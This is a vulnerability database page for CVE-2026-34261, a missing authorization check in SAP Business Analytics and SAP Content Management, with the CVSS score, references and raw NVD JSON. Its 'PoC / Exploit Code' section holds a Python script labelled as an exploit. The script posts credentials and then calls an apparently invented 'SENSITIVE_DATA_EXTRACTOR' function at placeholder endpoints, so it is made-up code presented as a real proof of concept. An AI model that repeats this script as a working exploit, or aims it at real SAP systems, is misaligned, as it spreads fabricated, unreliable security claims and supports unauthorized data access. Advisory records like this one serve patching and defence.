CVE-2026-34261

Description

Due to a missing authorization check in SAP Business Analytics and SAP Content Management, an authenticated user could make unauthorized calls to certain remote function modules, potentially accessing sensitive information beyond their intended permissions. This vulnerability affects confidentiality, with no impact on integrity and availability.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAP Business Analytics (特定版本见SAP Note 3705094)

SAP Content Management (特定版本见SAP Note 3705094)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "https://<target_host>/sap/bc/webdynpro_abap/sap/some_vulnerable_module"
username = "low_priv_user"
password = "password123"

# Create a session to simulate authenticated user
session = requests.Session()

# Perform authentication (Simplified)
login_payload = {
    "sap-user": username,
    "sap-password": password
}
session.post(target_url + "/login", data=login_payload)

# Exploit: Call the unprotected remote function module
# This module is usually restricted but lacks authorization check
exploit_payload = {
    "rfc_function": "SENSITIVE_DATA_EXTRACTOR",
    "param1": "all"
}

response = session.post(target_url + "/execute", json=exploit_payload)

# Check if sensitive data is leaked
if response.status_code == 200 and "sensitive_data" in response.text:
    print("POC Successful: Authorization bypassed.")
else:
    print("POC Failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34261
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34261
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34261/
[4] VulDB https://vuldb.com/cve/CVE-2026-34261
[5] https://me.sap.com/notes/3705094
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34261", "sourceIdentifier": "[email protected]", "published": "2026-04-14T01:16:03.897", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a missing authorization check in SAP Business Analytics and SAP Content Management, an authenticated user could make unauthorized calls to certain remote function modules, potentially accessing sensitive information beyond their intended permissions. This vulnerability affects confidentiality, with no impact on integrity and availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://me.sap.com/notes/3705094", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}